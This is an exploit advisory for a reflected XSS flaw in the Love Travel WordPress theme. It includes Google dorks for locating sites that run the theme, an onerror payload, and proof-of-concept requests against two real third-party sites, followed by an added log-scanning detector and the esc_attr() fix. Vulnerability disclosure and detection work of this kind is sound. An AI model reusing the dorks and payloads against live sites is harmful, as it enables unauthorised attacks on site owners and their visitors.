[+] :: Exploit Title: Love Travel WordPress theme v3.8 - Unauthenticated Reflected XSS
[+] :: Google Dork #1: inurl:/wp-content/themes/lovetravel/
[+] :: Google Dork #2: inurl:/wp-content/themes/lovetravel-child/
[+] :: Date: 2020-09-09
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Nicdark [ http://www.nicdarkthemes.com ]
[+] :: Software Version: 3.8
[+] :: Software Link: https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79
[i] :: Info:
An unauthenticated reflected XSS vulnerability was discovered in the Love Travel theme for WordPress; affected versions: 2.0-3.8.
Vulnerable parameters: keyword, date_from, date_to, price_from_to, nicdark_price_from, nicdark_price_to.
[$] :: Payload:
"><img src=x onerror=alert(`Ex.Mi`);alert(document.domain);>
[!] :: PoC #1:
https://www.mysunsea.net/packages/?advsearch=true&posttype=packages&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&tax-0=visibilita&visibilita=evidenza-in-homepage&tax-1=categoria&categoria=grecia&tax-2=strutture&strutture=grecia&tax-3=destination-package&destination-package=cefalonia&tax-4=typology-package&typology-package=combo&tax-5=duration-package&duration-package=&tax-6=person-package&person-package=&date_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&date_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&price_from_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&qnt-taxonomies=7&nicdark_price_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&nicdark_price_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E
[!] :: PoC #1 (Burp Suite):
GET /packages/?advsearch=true&posttype=packages&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&tax-0=visibilita&visibilita=evidenza-in-homepage&tax-1=categoria&categoria=grecia&tax-2=strutture&strutture=grecia&tax-3=destination-package&destination-package=cefalonia&tax-4=typology-package&typology-package=combo&tax-5=duration-package&duration-package=&tax-6=person-package&person-package=&date_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&date_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&price_from_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&qnt-taxonomies=7&nicdark_price_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&nicdark_price_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E HTTP/1.1
Host: www.mysunsea.net
[!] :: PoC #2:
http://www.polynesievoyages.pf/blog/packages/?advsearch=true&posttype=&keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&tax-0=&destination-package=&tax-1=typology-package&typology-package=&tax-2=duration-package&duration-package=&tax-3=person-package&person-package=&date_from=&date_to=&price_from_to=&qnt-taxonomies=4
[!] :: PoC #2 (Burp Suite):
GET /blog/packages/?advsearch=true&posttype=&keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&tax-0=&destination-package=&tax-1=typology-package&typology-package=&tax-2=duration-package&duration-package=&tax-3=person-package&person-package=&date_from=&date_to=&price_from_to=&qnt-taxonomies=4 HTTP/1.1
Host: www.polynesievoyages.pf
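[i] :: Detection (added example):
The following log-scanning script is an added example, not part of the original advisory or the vendor's code. It takes access-log lines (constructed samples, not real traffic), extracts the request target, and flags requests that carry HTML markup in any of the six reflected parameters listed above; it decodes twice so a double-URL-encoded payload is inspected as well.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Parameters the advisory lists as reflected without output escaping (Love Travel 2.0-3.8).
VULN_PARAMS = {"keyword", "date_from", "date_to", "price_from_to",
               "nicdark_price_from", "nicdark_price_to"}

# Markup that has no business in a search keyword or a date/price filter value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

# Request line inside an Apache/nginx combined-format access log entry.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Sep/2020:12:00:01 +0000] "GET /packages/?advsearch=true'
    '&keyword=greece&date_from=2020-10-01&date_to=2020-10-14 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Sep/2020:12:00:05 +0000] "GET /packages/?advsearch=true'
    '&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&date_from= HTTP/1.1" 200 5210',
    '198.51.100.9 - - [09/Sep/2020:12:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100',
]


def suspicious_params(target):
    """Return {param: decoded value} for advisory-listed params whose value carries markup."""
    hits = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if name not in VULN_PARAMS:
            continue
        for value in values:
            # parse_qs decodes once; decode again so a double-encoded value is inspected too.
            decoded = unquote_plus(value)
            if MARKUP_RE.search(decoded):
                hits[name] = decoded
    return hits


def scan_log(lines):
    """Return [(line_no, hits)] for entries whose request abuses one of the reflected params."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        if match:
            hits = suspicious_params(match.group("target"))
            if hits:
                findings.append((line_no, hits))
    return findings


if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {hits}")
```

The same check can be applied at the edge (WAF rule or WordPress filter) before the value reaches the template; the durable fix is escaping these values with esc_attr() on output in the theme.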
[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi